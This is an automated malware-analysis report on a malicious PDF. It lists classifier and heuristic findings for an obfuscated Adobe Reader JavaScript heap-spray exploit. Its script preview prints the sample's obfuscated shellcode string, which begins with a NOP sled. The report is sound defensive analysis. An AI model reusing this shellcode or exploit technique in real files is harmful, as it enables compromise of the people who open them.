MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file was flagged as malicious by an ML classifier. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0031_000.js', is the primary indicator of malicious activity. This script is likely responsible for downloading and executing a second-stage payload, a common technique for malware delivery. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier malicious score 0.9980
Heuristics 7
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
k1 |
pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 1206312 bytes |
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
|
|||
javascript_obj0031_000.js |
pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 5453 bytes |
SHA-256: da46c4b5a4e5867d625e812e2353d3a49369f70c04e256659909fa6c257adb63 |
|||
Preview scriptFirst 1,000 lines of the extracted script
function start()
{
sc = UnEscApeYGVtffRDXedcTGByhn("\x25\x759090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66\x25\x7558c0"+
"\x25\x758a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3\x25\x75ffff"+
"%u5942%u4b43%u5941%u5841%u5841%u4646%u6b41%u7042%u6c43%u4b48%u4843%u6841"+
"%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5643%u7342"+
"%u6d48%u5843%u5a43%u5842%u5541%u5841%u5841%u5841%u4948%u6744%u4348%u7442"+
"%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6843%u4b48%u6443"+
"%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48"+
"%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41"+
"%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446"+
"%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041"+
"%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48"+
"%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444"+
"%u4441%u6943%u7342%u7742%u4d43%u6c43%u5841%u5841%u5841%u5841%u6243%u5841"+
"%u4d48%u4d43%u5443%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u6441"+
"%u4f42%u6546%u5846%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5443"+
"%u4b48%u7543%u6441%u4b48%u4742%u7348%u5942%u7248%u7742%u6c48%u6a41%u7342"+
"%u6a41%u7242%u6a48%u4e42%u7345%u4e42%u7a42%u5242%u4442%u6243%u5841%u4d48"+
"%u4d43%u6843%u5843%u4f42%u6546%u5443%u4b48%u4546%u6441%u5a43%u4f42%u6546"+
"%u4443%u4f42%u4546%u4441%u4b48%u4546%u6843%u7141%u4546%u5043%u4348%u7543"+
"%u5043%u5841%u7743%u7248%u4f42%u6546%u4443%u4f42%u4546%u5041%u7342%u4e48"+
"%u4643%u5641%u5445%u4348%u7948%u7548%u7043%u4b42%u5748%u4d42%u5741%u6b41"+
"%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u6548%u4f41%u5841%u7443%u4e41"+
"%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48"+
"%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u734b"+
"%u734b%u734b%u734b%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6446%u6d43%u6543%u7843%u7641"+
"%u6d43%u7043%u6d43%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545"+
"%u6646%u5841%u5841%u5841%u5842%u6c48%u4e42%u4f42%u4f42%u4b48%u6845%u4b48"+
"%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42%u4f42"+
"%u4f42%u6b41%u7942%u4948%u4543%u5846%u4348%u4d43%u5846%u6444%u6b41%u7942"+
"%u5943%u4f42%u6546%u5846%u4f42%u4546%u4444%u6541%u484b%u7a48%u4a41%u5841"+
"%u7a43%u5445%u6541%u484b%u734b%u4a41%u5841%u6746%u5542%u7846%u4f42%u5841"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u5844%u5843%u7846"+
"%u4f42%u5841%u5841%u5841%u4f42%u4546%u5441%u4b48%u7842%u4b48%u4d43%u5844"+
"%u6344%u7142%u4348%u5842%u6544%u7642%u5841%u5841%u4f42%u6546%u5844%u4f42"+
"%u4546%u4841%u6243%u5841%u6243%u5841%u7846%u5841%u4741%u5841%u5841%u4f42"+
"%u6546%u5846%u4f42%u4546%u7841%u6243%u5841%u4d48%u4d43%u5443%u5843%u6243"+
"%u6444%u4d48%u4d43%u4446%u5843%u4f42%u6546%u5846%u4f42%u4546%u7844%u6243"+
"%u5841%u6243%u5841%u7846%u4841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42"+
"%u4546%u7841%u4546%u6243%u5841%u7846%u484b%u5841%u5841%u5841%u6243%u5a41"+
"%u6243%u5841%u6243%u5941%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u7846"+
"%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u4b48%u4f42%u4546"+
"%u4b48%u5445%u4f42%u6e43%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348"+
"%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4443%u7846%u5841%u6444"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u6441%u4b48%u4d43"+
"%u4446%u4948%u4d43%u5043%u5842%u4243%u4e42%u4f42%u4f42%u4546%u6b41%u7942"+
"%u5943%u4d48%u4d43%u7846%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42"+
"%u4f42%u4f42%u5543%u6243%u5841%u6243%u4f42%u4f42%u4546%u6444%u5048%u5048"+
"%u5048%u4546%u4b48%u5445%u4348%u7442%u4442%u6243%u4542%u5842%u4f48%u5841"+
"%u5841%u5841%u4948%u4d43%u4c42%u4f42%u6546%u5041%u5842%u4443%u5841%u5841"+
"%u5841%u4948%u4d43%u4442%u6243%u5841%u4d48%u4d43%u4842%u5843%u4f42%u6546"+
"%u4442%u4f42%u6546%u5041%u4f42%u6546%u4c42%u5842%u6346%u5841%u5841%u5841"+
"%u4b48%u4d43%u4842%u7942%u7242%u6444%u5841%u7445%u7445%u4546%u4b48%u5445"+
"%u4348%u7442%u4842%u6243%u4542%u5842%u4746%u5841%u5841%u5841%u4948%u4d43"+
"%u4c42%u4b48%u4543%u5041%u4b48%u4d43%u5441%u7142%u5042%u4841%u6e43%u4b48"+
"%u7142%u5843%u4f42%u6546%u4c42%u5842%u4343%u5841%u5841%u5841%u7942%u7242"+
"%u5041%u5841%u7445%u7445%u7445%u4546%u4b48%u5445%u4346%u4b48%u4d43%u5041"+
"%u4d48%u5843%u6344%u4b48%u7844%u4348%u7042%u6444%u4d48%u4b48%u4f42%u4e42"+
"%u4e42%u4e42%u4742%u6342%u4344%u7345%u4148%u5142%u484b%u484b%u484b%u484b"+
"%u6446%u5942%u4742%u7142%u484b%u484b%u5841%u5841%u6546%u6644%u7142%u5942"+
"%u4841%u4348%u7042%u5a41%u6845%u5142%u4341%u7242%u5343%u7942%u7242%u6444"+
"%u5841%u4f42%u4544%u6444%u7841%u4843%u5841%u4f42%u4544%u5041%u7841%u4843"+
"%u5841%u4f42%u4544%u5841%u7841%u4843%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u3030");
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.